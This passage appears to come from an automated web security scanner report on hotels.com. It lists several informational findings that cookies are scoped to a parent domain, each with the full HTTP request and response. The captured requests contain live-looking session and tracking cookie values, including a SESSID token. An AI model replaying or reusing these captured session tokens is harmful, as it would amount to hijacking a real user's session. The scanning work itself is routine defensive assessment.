User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; SSLB=1; user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUw..; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSPV=RcAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAA

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:31:07 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 00:28:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=1; path=/; domain=.hotels.com
Set-Cookie: SSPV=H7gAAAAAAAIAAAAAAAAAAAAAAAYAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 00:28:19 GMT
Set-Cookie: homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 00:28:19 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:28:19 GMT; Path=/
Content-Length: 238921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:
...[SNIP]...
13.162. http://www.hotels.com/hotel/hoteldata.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /hotel/hoteldata.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hotel/hoteldata.html?destinationId=1401516&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&validate=false&previousDateful=false&nightlyPrice=289%2CUSD&dateful=true HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/xml, text/xml, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:33:11 GMT
Expect:
Content-Type: text/xml;charset=UTF-8
Pragma: no-cache
RTSS: 1
Content-Length: 12556
Date: Mon, 03 Oct 2011 00:28:57 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: mvthistory=103.4.1.i6%3A132.2.0.i2%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:28:56 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTAzLjQuMS5pNjoxMzIuMi4wLmkyfEhDT01fVVMhRSoxMDkzNjh8MDQvMTAvMjAxMXwwNy8xMC8yMDExfDI.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:28:57 GMT; Path=/

<additional-hotel-data>
<trip-advisor>
<ta-reviews-trigger>
<![CDATA[
<h4 class="property_details_reviews_third_party_title">
TripAdvisor reviews for Omni Parker House</h
...[SNIP]...
13.163. http://www.hotels.com/hoteldetails/urgencypopup.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /hoteldetails/urgencypopup.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hoteldetails/urgencypopup.html?hotelId=109368 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:31:07 GMT
ntCoent-Length: 150
Expect:
Content-Type: text/html;charset=utf-8
Content-Length: 150
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:28:41 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTg1LjAuMC5pMToxMTQuMS4wOjEyNC4xLjAuaTE6MTAzLjQuMS5pNjoxNzEuMS4wOjEzMC4xLjEuaTI6NDguMS4wOjk3LjczLjEuaTM6OTguNi40OjE0Mi4wLjAuaTQ6MTk4LjIuMDoxNDUuMC4wLmkyOjIwMC4wLjA6MTM3LjAuMC5pMjoxMDguMS4wLmkyOjE5MC4zLjA6MTUyLjAuMC5pMjoxMzQuMC4xOjE5Ni4xLjA6Mi4yLjE6MjA5LjAuMToxNDcuMC4xLmk2OjkyLjAuMC5pMToxMjEuNTAzLjAuaTc6MTMyLjIuMC5pMjoxMjIuMS4wLmkzOjEzOC4xLjA6MTQ5LjAuMC5pMToxMDQuMC4xOjE5NS4wLjB8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8Mg..; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:28:41 GMT; Path=/

<span id="sense_of_urgency_close" class="blue" title="Close popup"></span>
<p>
This hotel has been booked 13 times in the last 24 hours</p>
13.164. http://www.hotels.com/html/blank.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /html/blank.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /html/blank.html HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SSRT=Kf2ITgA; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; SSLB=1; SSPV=EMAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAA; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUw..

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Cteonnt-Length: 152
Expect:
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Content-Length: 152
Expires: Sat, 26 Mar 2011 15:35:18 GMT
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:10:08 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SSPV=usAAAAAAAAAAAAAAAAAAAAAAAAsAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 00:10:08 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title></title></head><body><p></p></body></html>
13.165. http://www.hotels.com/html/tealeaf.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /html/tealeaf.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /html/tealeaf.html HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
Content-Length: 1348
Origin: http://www.hotels.com
X-TeaLeaf-Page-Img-Fail: 36
X-TeaLeaf-Page-Render: 63175
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2011.07.22.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: INIT
X-TeaLeaf-Page-Url: /search.do
Accept: */*
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SSRT=Kf2ITgA; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; s_cc=true; s_sq=%5B%5BB%5D%5D; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; SSLB=1; user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUw..; SSPV=I8AAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAA; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

<ClientEventSet PostTimeStamp="1317600763816" ><ClientEvent Count="1" Type="PERFORMANCE" SubType="INIT" TimeDuration="63175" DateSince1970="1317600617958" PageId="ID19H9M14S783R0.4504159395582974" >

...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Cteonnt-Length: 152
Expect:
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=0, proxy-revalidate
Content-Length: 152
Expires: Sat, 26 Mar 2011 15:33:11 GMT
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:13:44 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SSPV=RcAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 00:13:44 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title></title></head><body><p></p></body></html>
13.166. http://www.hotels.com/search.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /search.do

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=hotels&grp=9702&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B222113440%3B45762978%3Bg%3Fhttp%3A%2F%2Fwww.hotels.com%2FPPCSearch%3Fcity%3D%24%7Bcity%7D%2C%24%7Bstate%7D%26arrivalDate%3D%24%7BdepartureDate%3Ad%3A%22dd%2Fmm%2Fyyyy%22%7D%26adultsPerRoom%3D2%26numberOfRooms%3D%24%7Brooms%7D%26departureDate%3D%24%7BreturnDate%3Ad%3A%22dd%2Fmm%2Fyyyy%22%7D%26PSRC%3DIGOUGO%26rffrid%3Dmdp.hcom.US.138.160.02&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=150&pos=3&aii=2fc59ddf-790d-4415-832a-eafa2c6a46cb&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SSRT=Kf2ITgA; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; SSLB=1; SSPV=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; user=QSplbl9VU3xIQ09NX1VT

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:33:11 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:10:04 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: SSLB=1; path=/; domain=.hotels.com
Set-Cookie: SSPV=ZgAAAAAAAAAAAAAAAAAAAAAAAAYAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 00:10:04 GMT
Set-Cookie: mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:10:04 GMT; Path=/
Set-Cookie: homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 00:10:04 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMTo5Ny43My4xLmkzOjk4LjYuNDoxMzcuMC4wLmkyOjE0NS4wLjAuaTI6MTA4LjEuMC5pMjoxNTIuMC4wLmkyOjIuMi4xOjE5Ni4xLjA6OTIuMC4wLmkxOjEzMi4yLjAuaTI6MTIxLjUwMy4wLmk3OjEzOC4xLjA6MTk1LjAuMDoxMDQuMC4xfEhDT01fVVM.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:10:04 GMT; Path=/
Content-Length: 368925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
13.167. http://www.hotels.com/search/search.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /search/search.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search/search.html?cd=10-14-11&dd=10-16-11&hid=205543&nr=1&pn=1&r=2&rl=destination%3A1401516%3APROVIDED%3APROVIDED&vt=LIST HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
